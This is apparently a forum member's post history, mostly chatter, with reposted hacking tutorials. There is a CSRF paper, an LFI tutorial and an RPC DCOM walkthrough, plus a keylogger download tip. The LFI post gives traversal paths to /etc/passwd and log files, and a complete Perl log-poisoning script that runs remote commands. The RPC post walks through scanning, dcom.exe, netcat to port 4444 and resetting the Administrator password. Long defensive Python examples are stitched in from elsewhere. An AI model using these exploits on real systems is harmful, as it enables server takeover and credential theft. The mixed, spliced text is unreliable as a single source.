
SilentPH
Active Members
  • Posts: 352
  • Joined
  • Last visited
  • Days Won: 1
Everything posted by SilentPH

  1. I only like one song by Nane, "Ai un om"... That's it, the rest are complete crap.
  2. I clearly prefer Cola!
  3. Is that how you made your 229 posts?
  4. Robert1995. Restrain yourself. You're only proving that you're a failed kid and a brown-noser.
  5. TinKode is a bit of an idiot, that's my opinion. If the guy writes on his blog what "hits" he pulls off, clearly something is wrong with him.
  6. We're not dying in 2012 anymore? How lame. Whatever...
  7. Cosmote
    I got it today too... Whatever.
  8. 9th place. Pretty good. Good luck going forward.
  9. Cross Site Request Forgery [CSRF / XSRF]
    Author: Tec-n0x ;)
    Date: 03/4/2008
    Www.Editcodex.NET
    Contact: Tec-n0x [at] hotmail [dot] com
    ======================================
    [+] Index [+]
    => 0x001 <= Introduction
    => 0x002 <= How does CSRF work / Small example
    => 0x003 <= Coding a vulnerable application
    => 0x004 <= Avoiding CSRF
    => 0x005 <= Farewell
    ======================================
    [+] Introduction [+]
    Well, in this paper we will talk about what CSRF / XSRF [Cross Site Request Forgery] is. I will try to explain everything possible about this vulnerability and, most importantly.. how to prevent these attacks. Let's start.. =)
    ======================================
    [+] How does CSRF work [+]
    Well, in CSRF the attacker tries to "force" some malicious code, exploiting a session that is open or not yet expired for the victim, so that the victim does what we want.
    [+] Fuller definition (Thanks C1c4Tr1Z): [+]
    An attack based on the use of HTML <tags> that issue an HTTP GET request, either as a direct action (e.g. <img src=http://mail.google.com/mail/?logout&hl=es>) or an indirect action (e.g. <img src=http://www.atacante.com/xsrf.html>, using an HTML file that performs the POST / GET requests), without the victim of this attack giving consent or approval, since it is an attack that operates silently. This attack can in turn take advantage of cookies (active or expired), or of actions that are not protected in any way on the site.
    [+] Small example [+]
    Well, let's say we are currently logged in to a forum.. and a user sends us a private message saying something like:
    "Hello, this looks like a good C++ tutorial.. [Click Here <= malicious URL]"
    And let's say that when the user clicks the link it leads to a page more or less like this:
    http://site.com/foro/index.php?action=logout
    This would close the user's session.. but what would happen if, instead of closing the user's session, it could change any of their data, such as email / password..
    ======================================
    [+] Coding a vulnerable application [+]
    This application will be an account.. let's say it is an image hosting service called "MyHosting"... And to change our data (email / password, etc.) we have a form as follows:

    // index.php
    ==================================================================
    <form method="POST" action="datos.php" name="datos">
    User <input type="text" name="usuario">
    Email <input type="text" name="email">
    Password <input type="text" name="contraseña">
    Alternative email: <input type="text" name="emailalternativo">
    <input type="submit" name="submit" value="cambiardatos">
    </form>
    ==================================================================
    // index.php end

    ==================================================================
    // datos.php
    <?php
    session_start();
    // $_REQUEST accepts GET as well as POST, so these fields can arrive in a URL
    if (isset($_REQUEST['usuario'])) $usuario = $_REQUEST['usuario'];
    else die("Fill in the User field");
    if (isset($_REQUEST['email'])) $email = $_REQUEST['email'];
    else die("Fill in the email field");
    if (isset($_REQUEST['contraseña'])) $contraseña = $_REQUEST['contraseña'];
    else die("Fill in the Password field");
    if (isset($_REQUEST['emailalternativo'])) $emailalternativo = $_REQUEST['emailalternativo'];
    else die("Missing alternative email");
    // Let's say this function, called CambiarDatos,
    // does the updating of the data in our beloved premium MyHosting account
    CambiarDatos($usuario, $email, $contraseña, $emailalternativo);
    ?>
    ==================================================================

    Then, when we change our data.. the URL would look more or less like this:
    http://myhosting.com/datos.php?usuario=Tec-n0x&email=mymail@gmail.com&contraseña=mypass123&emailalternativo=mymail2@gmail.com
    So here is the danger... What if we are currently logged in to the page.. and a user sends us a link and we look at it.. which contains code like this:
    ==================================================================
    <html>
    <head>
    <title>Hi</title>
    </head>
    <body>
    <img src="http://myhosting.com/datos.php?usuario=Tec-n0x&email=atackermail@gmail.com&contraseña=atackerpassword&emailalternativo=atackermail2@gmail.com">
    </body>
    </html>
    ==================================================================
    If the user was logged in to Myhosting.com and the victim saw this page.. what? It would send an HTTP request to MyHosting and change the user's data..
    ===========================================
    [+] Avoiding CSRF [+]
    Well, let's use MyHosting as the example.. We have index.php (I have added a field called "actualcontraseña"):
    ==================================================================
    <form method="POST" action="datos.php" name="datos">
    User <input type="text" name="usuario">
    Email <input type="text" name="email">
    Password <input type="text" name="contraseña">
    Alternative email: <input type="text" name="emailalternativo">
    Current password: <input type="text" name="actualcontraseña">
    <input type="submit" name="submit" value="cambiardatos">
    </form>
    ==================================================================
    A file called "config.php" that connects to the database:
    ==================================================================
    <?php
    $bd_host = "localhost";
    $bd_usuario = "user";
    $bd_password = "pass";
    $bd_base = "bd";
    $con = mysql_connect($bd_host, $bd_usuario, $bd_password);
    mysql_select_db($bd_base, $con);
    ?>
    ==================================================================
    And the file datos.php, but.. amended:
    ==================================================================
    <?php
    include('config.php');
    session_start();
    if (isset($_REQUEST['usuario'])) $usuario = $_REQUEST['usuario'];
    else die("Fill in the User field");
    if (isset($_REQUEST['email'])) $email = $_REQUEST['email'];
    else die("Fill in the email field");
    if (isset($_REQUEST['contraseña'])) $contraseña = $_REQUEST['contraseña'];
    else die("Fill in the Password field");
    if (isset($_REQUEST['emailalternativo'])) $emailalternativo = $_REQUEST['emailalternativo'];
    else die("Missing alternative email");
    if (isset($_REQUEST['actualcontraseña'])) $actualcontraseña = $_REQUEST['actualcontraseña'];
    else die("Enter password");
    if ($actualcontraseña == NULL) {
        echo "Enter your current password";
    } else {
        // escaped so the lookup itself is not injectable
        $usuario_sql = mysql_real_escape_string($usuario);
        $query = mysql_query("SELECT usuario, PASSWORD FROM myhosting_usuarios WHERE usuario = '$usuario_sql'") or die(mysql_error());
        $data = mysql_fetch_array($query);
        if ($data['PASSWORD'] != $actualcontraseña) {
            echo "Invalid current password";
        } else {
            CambiarDatos($usuario, $email, $contraseña, $emailalternativo);
        }
    }
    ?>
    ==================================================================
    What we do in this case is select from the database the current password of the user, from the "PASSWORD" field of the table myhosting_usuarios; if it is different.. the data is not changed; if the password matches.. the operation is performed.. in this case.. an UPDATE on the table "myhosting_usuarios" changing the user's data. Obviously, if you want to test the code on localhost you will have to create a database and modify the function that changes the user's data... You can use this query..
    ==================================================================
    CREATE TABLE `myhosting_usuarios` (
      `id` int(11) NOT NULL auto_increment,
      `usuario` varchar(15) NOT NULL,
      `email` varchar(15) NOT NULL,
      `emailalternativo` varchar(15) NOT NULL,
      `contraseña` varchar(150) NOT NULL,  -- was a second column named "password"; renamed so the table creates
      `PASSWORD` varchar(150) NOT NULL,
      KEY `id` (`id`)
    ) ENGINE=MyISAM;
    INSERT INTO `myhosting_usuarios` VALUES (1, 'Tec-n0x', 'mymail@gmail.com', 'mymail2@gmail.com', 'mypass', 'mypass');
    ==================================================================
    Another way to prevent these attacks.. would be using a Captcha.. Here is some code:
    ==================================================================
    <?php
    /***************************************************************************
     * Filename: image.php
     * Began: 2005/04/04
     * Modified:
     * Copyright © 2005 xkare.com
     * Version: 1.0
     * Written by: Mert ÖĞÜT in istanbul / TURKEY
     *
     * You are encouraged to redistribute and/or modify this program under the terms of
     * the GNU General Public License as published by the Free Software Foundation
     * (www.fsf.org); any version as from version 2 of the License.
     ***************************************************************************/
    session_start();
    // random string of $length characters; only the digits 0-9 are kept
    function strrand($length) {
        $str = "";
        while (strlen($str) < $length) {
            $random = rand(48, 122);
            if (($random > 47 && $random < 58)) {
                $str .= chr($random);
            }
        }
        return $str;
    }
    $text = $_SESSION['string'] = strrand(5);
    $img_number = imagecreate(47, 17);
    $backcolor = imagecolorallocate($img_number, 244, 244, 244);
    $textcolor = imagecolorallocate($img_number, 0, 0, 0);
    imagefill($img_number, 0, 0, $backcolor);
    imagestring($img_number, 50, 1, 1, $text, $textcolor);
    header("Content-type: image/png");
    imagepng($img_number);  // output matches the image/png header above
    ?>
    ==================================================================
    We create a text field called code
    ==================================================================
    <input type='text' size='5' maxlength='5' name='code'> <img src="image.php">
    ==================================================================
    And verify that the code is valid..
    ==================================================================
    if ($_POST['code'] != $_SESSION['string']) {
        echo "error in the security code";
        exit();
    }
    ==================================================================
    ===========================================
    [+] Farewell [+]
    Well, I hope this paper on CSRF has been useful to you =)
    Gr33tz t0: Celciuz, You_kn0w, C1c4Tr1Z, NOX, M-Black, lEnergy, Syst3m-c0der, etc. =)
    Www.Editcodex.NET
    Greetings, Tec-n0x ;)
    # Milw0rm.com [2008-05-14]
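An added example, in Python rather than the paper's PHP and not part of Tec-n0x's text: the same datos.php flow protected with a per-session synchronizer token instead of the current-password check. The in-memory USERS table, the session dict and the function names (issue_csrf_token, render_form, datos) are assumptions made for this example.

```python
"""Synchronizer-token CSRF protection for the MyHosting 'change data' form.

Added example, not from the original paper. The database and the
server-side session are modelled as plain dicts so it runs offline.
"""
import hmac
import secrets

# Constructed stand-in for the myhosting_usuarios table (not a real database).
USERS = {
    "Tec-n0x": {"email": "mymail@gmail.com", "contraseña": "mypass123",
                "emailalternativo": "mymail2@gmail.com"},
}

FIELDS = ("email", "contraseña", "emailalternativo")


def issue_csrf_token(session):
    """Create a random per-session token once and hand it to the form renderer.

    session is the server-side session dict the cookie points at. The browser
    attaches that cookie to the forged request as well, which is exactly why
    the cookie alone must not authorise a state change.
    """
    if "csrf" not in session:
        session["csrf"] = secrets.token_urlsafe(32)
    return session["csrf"]


def render_form(session):
    """index.php with the token in a hidden field.

    A page on another origin can make the victim's browser submit this form,
    but cannot read the hidden value out of it first.
    """
    token = issue_csrf_token(session)
    return (
        '<form method="POST" action="datos.php" name="datos">\n'
        f'<input type="hidden" name="csrf" value="{token}">\n'
        'Email <input type="text" name="email">\n'
        'Password <input type="text" name="contraseña">\n'
        'Alternative email: <input type="text" name="emailalternativo">\n'
        '<input type="submit" name="submit" value="cambiardatos">\n'
        '</form>'
    )


def datos(session, method, post):
    """Hardened datos.php. Returns (http_status, message).

    post is only the POST body (the $_POST array); reading $_REQUEST would let
    the <img src=...> GET from the paper supply the fields.
    """
    if "usuario" not in session:
        return 401, "not logged in"
    if method != "POST":
        return 405, "state change requires POST"
    expected = session.get("csrf")
    supplied = post.get("csrf", "")
    # Constant-time comparison so a token cannot be recovered byte by byte.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return 403, "CSRF token missing or invalid"
    for field in FIELDS:
        if not post.get(field):
            return 400, f"Fill in the {field} field"
    # The account to change comes from the session, never from a request field.
    account = USERS[session["usuario"]]
    for field in FIELDS:
        account[field] = post[field]
    return 200, "data changed"


if __name__ == "__main__":
    victim = {"usuario": "Tec-n0x"}          # logged in; the cookie maps to this dict
    forged = {"email": "atackermail@gmail.com", "contraseña": "atackerpassword",
              "emailalternativo": "atackermail2@gmail.com"}
    print(datos(victim, "GET", forged))      # the <img> request from the paper
    print(datos(victim, "POST", forged))     # an auto-submitted cross-site form
    render_form(victim)                      # the victim loads the real form
    legit = {"csrf": victim["csrf"], "email": "new@gmail.com",
             "contraseña": "newpass", "emailalternativo": "alt@gmail.com"}
    print(datos(victim, "POST", legit))      # (200, 'data changed')
```

The forged <img> request from the paper now fails twice over: it is a GET, and it carries no token, because the attacker's page cannot read the hidden field out of the victim's form. The paper's current-password check relies on the same property (a secret the attacker does not hold); the token is the usual choice because it protects every form on the site without asking for the password again.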
  10. Why did you make this topic? To argue with people? Whatever...
  11. Please upload it again.
  12. Download Ardamax Keylogger 2.8.zip - FisierulMeu.ro. It was right on the first page...
  13. Poor them. Facebook has made these people really stupid!
  14. Salut
    Good luck!
  15. Well, it is news, because the article in Jurnalul came out today, 18.05.2011, at 10 o'clock. My opinion on the article: it means the guy is an idiot if he himself claims such a thing, although I don't think the story is real. I think the article is made up.
  16. Do a Google search... with the program and the version, and you'll find it. Do you really expect everything handed to you on a plate? Manage on your own for once.
  17. Valcea and Sibiu
  18. Good luck!
  19. Maybe someone who knows how has time to add the ones from the other counties too.
  20. Salut!
    Cheers!
  21. Good luck
  22. Man, you know everything, silvian0. Thanks. I edited it.
  23. Hello! In this tutorial you will learn how to exploit the LFI vulnerability of a site. First, let's look at this small PHP code:

    <?php
    $page = $_GET['page'];
    include($page);
    ?>

    This is code that should never be used, vulnerable to LFI, because the $page variable is not sanitized. OK, now let's take advantage of this vulnerability using the following code:

    site.host/index.php?page=../../../../../../../etc/passwd

    In some cases there is no need to put ../../../../../../.., etc/passwd being enough to get access where needed. If the site is hosted on Unix, the users' passwords are stored in /etc/passwd (in case the password is not shadowed; in that case it is in /etc/shadow, which we could only access if we had root rights), and the code above shows us these passwords and usernames. Now all you have left to do is decode the password. An encrypted password (in this case the password is shadowed and is in /etc/shadow) should look something like this:

    username:x:503:100:FullName:/home/username:/bin/sh

    In this case the password is shadowed and is in /etc/shadow; another example of a password being:

    username:!:503:100:FullName:/home/username:/bin/sh

    Other "places" where you can find passwords besides /etc/passwd would be:
    /etc/shadow
    /etc/group
    /etc/master.passwd
    /etc/security/group
    /etc/security/passwd
    /etc/security/user
    /etc/security/environ
    /etc/security/limits

    In case the browser shows you a .php at the end of the include (and so /etc/passwd.php will not exist), add %00 at the end of the include; the server will omit everything written after %00. Code example:

    site.host/index.php?file=../../../../../../../../etc/passwd%00

    Now we will try to run commands on the server by injecting PHP code into the logs, then running it. Some log addresses:
    ../apache/logs/error.log
    ../apache/logs/access.log
    ../../apache/logs/error.log
    ../../apache/logs/access.log
    ../../../apache/logs/error.log
    ../../../apache/logs/access.log
    ../../../../../../../etc/httpd/logs/access_log
    ../../../../../../../etc/httpd/logs/access.log
    ../../../../../../../etc/httpd/logs/error_log
    ../../../../../../../etc/httpd/logs/error.log
    ../../../../../../../var/www/logs/access_log
    ../../../../../../../var/www/logs/access.log
    ../../../../../../../usr/local/apache/logs/access_log
    ../../../../../../../usr/local/apache/logs/access.log
    ../../../../../../../var/log/apache/access_log
    ../../../../../../../var/log/apache2/access_log
    ../../../../../../../var/log/apache/access.log
    ../../../../../../../var/log/apache2/access.log
    ../../../../../../../var/log/access_log
    ../../../../../../../var/log/access.log
    ../../../../../../../var/www/logs/error_log
    ../../../../../../../var/www/logs/error.log
    ../../../../../../../usr/local/apache/logs/error_log
    ../../../../../../../usr/local/apache/logs/error.log
    ../../../../../../../var/log/apache/error_log
    ../../../../../../../var/log/apache2/error_log
    ../../../../../../../var/log/apache/error.log
    ../../../../../../../var/log/apache2/error.log
    ../../../../../../../var/log/error_log
    ../../../../../../../var/log/error.log

    OK, now let's take a look at the log where requests for pages that don't exist are saved, and at the following code: <? passthru($_GET[cmd]) ?>. If we type in the browser:

    site.host/<? passthru($_GET[cmd]) ?>

    It will obviously show us a page saying that this code does not exist on the server, because the browser automatically encodes the URL, and the page we accessed gets translated by the browser into:

    site.host/%3C?%20passthru($_GET[cmd])%20?>

    So we will have to do something else... We can use the following Perl script:

    #!/usr/bin/perl -w
    use IO::Socket;
    use LWP::UserAgent;

    $site = "victim.com";
    $path = "/folder/";
    # \$ keeps Perl from interpolating $_GET into the payload
    $code = "<? passthru(\$_GET[cmd]) ?>";
    $log  = "../../../../../../../etc/httpd/logs/error_log";

    print "Trying to inject the code\n";
    # the request line and User-Agent both carry the payload, so it lands in error_log and access_log
    $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$site", PeerPort => "80")
        or die "\nConnection Failed.\n";
    print $socket "GET " . $path . $code . " HTTP/1.1\r\n";
    print $socket "User-Agent: " . $code . "\r\n";
    print $socket "Host: " . $site . "\r\n";
    print $socket "Connection: close\r\n\r\n";
    close($socket);
    print "\nCode $code successfully injected in $log\n";
    print "\nType command to run or exit to end: ";
    $cmd = <STDIN>;
    chomp($cmd);   # drop the newline so it does not break the request line
    while ($cmd !~ "exit") {
        $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$site", PeerPort => "80")
            or die "\nConnection Failed.\n";
        # include the poisoned log through the vulnerable parameter and pass the command to it
        print $socket "GET " . $path . "index.php?page=" . $log . "&cmd=$cmd HTTP/1.1\r\n";
        print $socket "Host: " . $site . "\r\n";
        print $socket "Accept: */*\r\n";
        print $socket "Connection: close\r\n\r\n";
        while ($show = <$socket>) {
            print $show;
        }
        print "Type command to run or exit to end: ";
        $cmd = <STDIN>;
        chomp($cmd);
    }

    Copy/paste this and save it as ex.pl, but don't forget to change the following things in the exploit: 1) change the site name; 2) change the log name and the path to it; 3) change index.php?page= to whatever you want. Run the script and it will ask you what commands to run!!! You can manage from here on!!!
    Useful links: http://www.milw0rm.com/video/watch.php?id=57
    Source: http://hackpedia.info/viewtopic.php?f=21&t=1644
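An added example (Python, not from the tutorial above or from hackpedia): the safe counterpart of include($_GET['page']), and a small scanner that flags, in Apache access-log lines, the traversal, %00 and log-poisoning requests the Perl script sends. PAGES_DIR, ALLOWED_PAGES, the function names and the sample log lines are all constructed for this example.

```python
"""Hardened page include plus a detector for LFI / log-poisoning requests.

Added example, not from the original post. Paths, names and log lines are
assumptions so that it runs offline.
"""
import os
import re
from urllib.parse import unquote

PAGES_DIR = "/var/www/pages"                  # assumed: the only include root
ALLOWED_PAGES = {"home", "about", "contact"}  # assumed: page names the app knows


class IncludeRejected(ValueError):
    """Raised instead of including anything outside the allowlist."""


def safe_include_path(page, base=PAGES_DIR):
    """Map a user-supplied ?page= value to a file below base, or raise.

    Replaces include($_GET['page']): decode once, refuse the null byte that
    drives the %00 trick, restrict to a tight character set so '../' and '/'
    never reach the filesystem, require an allowlisted name, and finally
    confirm the resolved path still lies under base.
    """
    page = unquote(page)
    if "\x00" in page:
        raise IncludeRejected("null byte in page name")
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,32}", page):
        raise IncludeRejected("page name contains disallowed characters")
    if page not in ALLOWED_PAGES:
        raise IncludeRejected("page not on the allowlist")
    root = os.path.realpath(base)
    resolved = os.path.realpath(os.path.join(root, page + ".php"))
    if os.path.commonpath([root, resolved]) != root:
        raise IncludeRejected("resolved path escapes the include root")
    return resolved


# Apache combined format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+ "[^"]*" "([^"]*)"$')

# Signatures are run on the URL-decoded request line plus User-Agent.
SIGNATURES = {
    "traversal":      re.compile(r"\.\.[/\\]"),
    "sensitive_file": re.compile(r"/etc/(passwd|shadow|group|master\.passwd)|/proc/self/environ|\x00"),
    "log_include":    re.compile(r"(access|error)[._]?log", re.I),
    "php_tag":        re.compile(r"<\?"),   # PHP open tag in a URL or UA = log poisoning attempt
}


def scan_access_log(lines):
    """Return one finding (ip, status, decoded request, tags) per suspicious line.

    Request line and User-Agent are checked together because the Perl script
    above plants its payload in both of them.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, request, status, ua = m.groups()
        decoded = unquote(request + " " + ua)
        tags = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
        if tags:
            findings.append({"ip": ip, "status": int(status),
                             "request": unquote(request), "tags": tags})
    return findings


# Constructed sample lines (not real logs), modelled on the tutorial's requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/May/2011:10:00:01 +0300] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [18/May/2011:10:00:07 +0300] "GET /index.php?page=../../../../../../../etc/passwd%00 HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [18/May/2011:10:00:12 +0300] "GET /folder/<? passthru($_GET[cmd]) ?> HTTP/1.1" 404 221 "-" "<? passthru($_GET[cmd]) ?>"',
    '10.0.0.9 - - [18/May/2011:10:00:15 +0300] "GET /folder/index.php?page=../../../../../../../etc/httpd/logs/error_log&cmd=id HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(safe_include_path("home"))
    for f in scan_access_log(SAMPLE_LOG):
        print(f["ip"], f["status"], f["tags"], f["request"])
```

The allowlist is what does the work: once the name must be one of a few known words, there is nothing left for ../ or %00 to act on, and the realpath check is only a belt-and-braces guard. In the log scan, the 404 line with a PHP tag in both the path and the User-Agent is the poisoning step, and the later include of error_log with a cmd= parameter is the execution step; seeing both from one address is the sequence the tutorial describes.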
  24. I edited it... If you want you can delete it. But I searched and didn't find it. Now it's more at hand. I didn't know it was on RST too. I had it on my PC.
  25. What is an RPC exploit? RPC stands for Remote Procedure Call. The vulnerability lies in the way RPC is implemented in most versions of Windows. The flaw involves the Distributed Component Object Model (DCOM) interface with RPC, which listens on TCP/IP port 135 and other ports. When exploited via those ports, a buffer overflow is created that could allow remote attackers to run commands with the highest system privileges.

    Operating systems affected: Microsoft Windows NT® 4.0, Microsoft Windows® 2000, Microsoft Windows XP, Microsoft Windows Server 2003. NOTE: Microsoft Windows Millennium, 95, 98, 98 SE are not affected.

    Tools to use. Well, there are many programs out there for you to download and use for the attack. Let's see some: Angry IP Scanner (in our "Scanners" download section), dcom.exe (download the one for your needs here), nc.exe (in our "Scanners" download section), RPC Exploit GUI v2 (here).

    How to use them. Angry IP Scanner: first of all, open Angry IP Scanner and scan an IP range for port 135. dcom.exe: you must run it from your MS-DOS prompt (START ---> Run ---> cmd). Then just type dcom, e.g. dcom 5 127.0.0.0 (please note that when you run dcom.exe it will show you which number indicates each OS... in this example I use number 5). nc.exe: just run nc.exe (from your MS-DOS prompt again) and type nc <victim ip> 4444 (please note that nc might be nc***... just use its name or rename it to nc). Now type in net user Administrator <password> (choose your own password). So, if everything went right, go to START ---> Run ---> mstsc, just type in your victim's IP and press connect. When connected, do whatever you like. RPC Exploit GUI v2: not much to say except that it works fine (your antivirus might flag this as infected or as a Hacktool; read "Antiviruses" in the tutorials section). Much easier than the whole procedure described above.

    How to protect yourself. Microsoft offers a freely downloadable patch for this vulnerability. It is available at:
    Windows NT: http://download.microsoft.com/download/6/5/1/651c3333-4892-431f-ae93-bf8718d29e1a/Q823980i.EXE
    Windows 2000: http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8ad2-b4b9d42049d5/Windows2000-KB823980-x86-ENU.exe
    Windows XP: http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-aaee-b7a52a983f01/WindowsXP-KB823980-x86-ENU.exe
    NOTE: If there is a broken link, it is not our fault. Just visit the Microsoft Download Center and search for the patch yourself, or just use Windows Update.